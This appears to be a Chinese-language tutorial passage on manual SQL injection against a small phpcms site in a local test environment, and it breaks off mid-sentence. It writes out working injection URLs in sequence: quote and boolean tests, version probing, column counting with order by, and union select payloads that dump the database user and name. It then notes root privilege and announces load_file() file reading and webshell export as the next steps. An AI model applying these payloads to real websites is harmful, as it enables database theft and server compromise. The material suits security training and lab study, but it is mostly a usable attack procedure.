测试环境为win7sp1+iis7.5+mysql5.1,目标为一个小型phpcms网站,存在注入的地址为http://127.0.0.1:8080/show.php?id=2
一. Root权限下的mysql注入
直接在网址后面添加引号http://127.0.0.1:8080/show.php?id=2'
直接爆出为Mysql数据库,使用xor 1=1 xor 1=2确定为整数型注入;
确定mysql版本号,提交http://127.0.0.1:8080/show.php?id=2 and ord(mid(version(),1,1))>51,返回正确,版本大于5.1,支持union查询;
使用order by 确认字段数,15时正确,16时错误,得出字段长度为15;
显示字段位置http://127.0.0.1:8080/show.php?id=2 and 1<1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,显示出3和11位置
现在我们来确认当前用户权限,提交http://127.0.0.1:8080/show.php?id=2 and 1<1 union select 1,2,user(),4,5,6,7,8,9,10,database(),12,13,14,15
是root权限哦,从root@localhost可以看出当前网站和数据库是位于同一台机器上的,当然我们是在自己的电脑上测试的
既然是root权限,而且是整形注入,我们就可以load_file()了,也可以导出webshell了,我们在3,或11的位置显示load_